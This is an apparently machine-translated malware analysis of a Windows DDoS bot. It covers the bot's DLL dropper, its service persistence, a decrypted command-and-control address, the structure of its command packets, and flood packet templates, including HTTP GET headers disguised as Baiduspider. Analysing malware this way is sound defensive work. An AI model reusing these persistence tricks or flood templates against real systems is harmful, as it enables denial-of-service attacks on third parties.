A DDoS sample under Windows

A DDoS sample under Windows.

Loading device

A 256_res.tmp file is released in the TEMP directory after the program is run

The file is then moved to the System32 directory and named Rasmedia.dll.

Delete the original file.

Loads the DLL file that starts the release and calls the install function exported by the DLL.

Rasmedia.dll

The function install will register the DLL as a service WINHELP32.

Specific as follows

After the service runs, there will be two threads open.

A thread is used to communicate with the remote server.

A thread copies itself into memory, and when it discovers that the image file is deleted, it copies itself again.

。

This function is used to implement circular write protection.

The other thread is used to communicate with the remote server, and the main process of its interaction is in the function startaddress.

The function begins by decrypting the remote server address fabao.309420.com:7002, which corresponds to an IP of 61.147.107.79. An IP address for Yangzhou, Jiangsu province.

After obtaining the current system information, the encryption is sent to the remote server.

The encryption algorithm is restored as follows:

The packets sent are as follows altogether 96 bytes.

The remote server's control package is then accepted.

The data structure is as follows:

command is the remote control command.

The Accack is the packet length and is also used as a judge of the attack.

Target_url is the target URL for the attack.

Port to attack the destination.

Attack_message is a custom attack data payload.

The command accepts commands such as remote command execution, downloading files, and so on, but it can be found that the main function or DDoS-based.

You can see here that the 0x41000001,0x32000004,0x32000001,0x31000005 is a compound instruction, and the broiler receives the command to perform several types of DDoS attacks against the target, and the remaining DDoS instructions each correspond to a DDoS attack.

The returned package is received here. This is a total of 228 bytes, at which time the data is in the encrypted state.

Decryption by the following function, you can find that the beginning of decryption data is 32000020, here is a DDoS, command. The attack target of this command

The Target_url field after continuing the decryption can be found to return a field for an attack target, which is http://code.moquta.com.

There are multiple attack patterns in the provided DDoS attack strategy, which is a 32000020 example of a DDoS attack via an HTTP GET request that has already written a template in the code, as follows: Just fill in the Target,host and Refere.

You can see that this mode selects the Port field specified by the V1 offset 208, which defaults to 80.

You can see here our return package that offsets to 0x50 (more than one 0 is the reason for decrypting the script).

The attack packet is sent here.

Attack packs in various ways

Where Rand is a random number generator.

0x31000001

Fun_createthread_sockrandipsend

send_package{

Gerneration with 5byte 8 times

}

Length:40

One turn

0x31000002

Fun_createthread_sockheapsendto

package{

+2 cout (start with 0)

+6 0

+8 TickCount

}encrypt_by_sub_10005480

Length = 4096

One turn 65534 package

0x41000001

Fun_createthread_sockrandtentimesendto

send_package{

BUF (Generation by Rand (97,122))

}

Length 30

One turn

Count% Sleep

0x31000005

Fun_createthread_sockrandsend

send_package{

BUF ((Byte) generation by Rand (0,255) <<16)

}

Length 1024

One turn all the time

Fun_createthread_sockconnect1

send_package{

Connect

}

One Ture one package

Then sleep

Fun_createthread_sockconnect2

send_package{

Connect

}

One turn package connect and close

0x37000001

Fun_createthread_sockendcontainsend

send_package{

BUF (command_package[212,228])

}

Length 16

One turn all the time

0x33000001

Fun_creathethread_sockrandwithcountsend

send_package{

BUF (#%d<<<<<i@c<<<<<%s! count,generation with Rand (65,122))

}

Length rand (20,120)

One turn 6500

0x31000003

Fun_callback_sockrandthousandtimesendto

send_package{

BUF ((int) (Generation with Rand (97,122) <<16) *512*4)

}

length:2048

One turn

0x32000004

Fun_createthread_socksend_withoutref_httpone

send_package{

80

' GET%s?=%d http/1.1 '

' User-agent:mozilla/5.0 (compatible; baiduspider/2.0; +http://www '

'. baidu.com/search/spider.html) '

' Host:%s '

' Cache-control:no-cache '

' Mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/s '

' earch/spider.html)

GET%s?=%d http/1.1 '

' User-agent:mozilla/5.0 (compatible; baiduspider/2.0; +http://www '

'. baidu.com/search/spider.html) '

' Host:%s:%d '

' Cache-control:no-cache '

}

Length:buff

One turn all the time

0x32000001

Fun_createthread_socksend_withoutref_httptwo

send_package{

80

' get/http/1.1 '

' Host:%s '

' User-agent:mozilla/5.0 (compatible; baiduspider/2.0; +http://www '

'. baidu.com/search/spider.html) '

' Cache-control:no-cache '

' Connection:close '

For other port

' get/http/1.1 '

' Host:%s:%d '

' User-agent:mozilla/5.0 (compatible; baiduspider/2.0; +http://www '

'. baidu.com/search/spider.html) '

' Cache-control:no-cache '

' Connection:close '

}without_referer

Length:buff

One turn all the time

0x32000001

Fun_createthread_socksend_onlyhost_http

send_package{

80

' get/http/1.1 '

' Host:%s '

For other port

' get/http/1.1 '

' Host:%s:%d '

}

Length:buf

One turn all the time

0x36000001

Fun_createthread_socksend_withref_httpone

send_package{

80

' GET%s http/1.1 '

' Host:%s '

' User-agent:mozilla/5.0+ (compatible;+baiduspider/2.0;++http://www '

'. baidu.com/search/spider.html) '

' Cache-control:no-store, Must-revalidate '

' referer:http://%s '

' Connection:close '

For other port

' GET%s http/1.1 '

' Host:%s:%d '

' User-agent:mozilla/5.0+ (compatible;+baiduspider/2.0;++http://www '

'. baidu.com/search/spider.html) '

' Cache-control:no-store, Must-revalidate '

' referer:http://%s '

' Connection:close '

}

Length:buff

One turn all the time

0x32000002

Fun_createthread_socksend_withref_httptwo

send_package{

80

' GET%s http/1.1 '

' Host:%s '

' User-agent:mozilla/5.0 (compatible; baiduspider/2.0; +http://www '

'. baidu.com/search/spider.html) '

' Cache-control:no-store, Must-revalidate '

' referer:http://%s '

' Connection:close '

For other port

' GET%s http/1.1 '

' Host:%s:%d '

' User-agent:mozilla/5.0 (compatible; baiduspider/2.0; +http://www '

'. baidu.com/search/spider.html) '

' Cache-control:no-store, Must-revalidate '

' referer:http://%s '

' Connection:close '

}

Length:buf

One turn all the time

A DDoS sample under Windows